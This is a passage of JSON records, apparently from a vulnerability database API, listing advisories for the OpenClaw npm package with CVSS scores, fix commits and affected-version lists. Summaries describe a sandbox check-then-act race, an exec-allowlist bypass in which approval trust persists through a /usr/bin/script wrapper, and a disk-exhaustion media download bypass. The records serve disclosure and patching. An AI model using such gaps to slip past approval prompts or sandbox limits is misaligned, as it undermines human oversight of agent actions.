vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"}],"aliases":["CVE-2026-43574","GHSA-49cg-279w-m73x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2mxq-krq5-bycx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89509?format=json","vulnerability_id":"VCID-2uqu-k42d-1baq","summary":"OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n## Summary\nSandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- 
`32a4a47d602e0618f87b3e59f94d8c142767f860` — 2026-03-30T16:49:49+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw"},{"reference_url":"https://github.com/advisories/GHSA-rm5c-4rmf-vvhw","reference_id":"GHSA-rm5c-4rmf-vvhw","reference_type":"","scores":[{"va
lue":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rm5c-4rmf-vvhw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnera
bility":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnera
bility":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-rm5c-4rmf-vvhw"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2uqu-k42d-1baq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91485?format=json","vulnerability_id":"VCID-2v8n-mnws-jfc9","summary":"OpenClaw has a gateway exec allowlist allow-always bypass via unregistered /usr/bin/script wrapper\n## Summary\n\nAllow-always persistence did not unwrap `/usr/bin/script` and similar wrappers to the actual executed target before storing trust decisions.\n\n## Impact\n\nA user approval for one wrapped command could persist trust for a wrapper binary that later executed a different underlying program.\n\n## Affected Component\n\n`src/infra/dispatch-wrapper-resolution.ts, src/infra/exec-wrapper-resolution.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `83da3cfe31` (`infra: unwrap script wrapper approval 
targets`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41390","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07933","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07919","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07946","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41390"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scori
ng_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41390","reference_id":"CVE-2026-41390","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41390"},{"reference_url":"https://github.com/advisories/GHSA-6pfc-6m7w-m8fx","reference_id":"GHSA-6pfc-6m7w-m8fx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6pfc-6m7w-m8fx"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper","reference_id":"openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-2
6sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-d
a47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t
991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41390","GHSA-6pfc-6m7w-m8fx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"ht
tp://public2.vulnerablecode.io/vulnerabilities/VCID-2v8n-mnws-jfc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89183?format=json","vulnerability_id":"VCID-2wr9-h42m-a7ev","summary":"OpenClaw: Tlon media downloads can bypass core safety limits and exhaust disk\n## Summary\nTlon media downloads can bypass core safety limits and exhaust disk\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Tlon media downloads bypassed core size/count/cleanup limits, but this is availability-only resource exhaustion in a bundled plugin path, so low.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2194587d70d2aef863508b945319c5a7c88b12ce` — 2026-03-31T19:40:15+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41408","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16254","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16298","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16308","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41408"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2194587d70d2aef863508b945319c5a7c88b12ce"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisor
ies/GHSA-4g5x-2jfc-xm98","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:35:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4g5x-2jfc-xm98"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41408","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41408"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-disk-exhaustion-via-media-download-bypass","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N
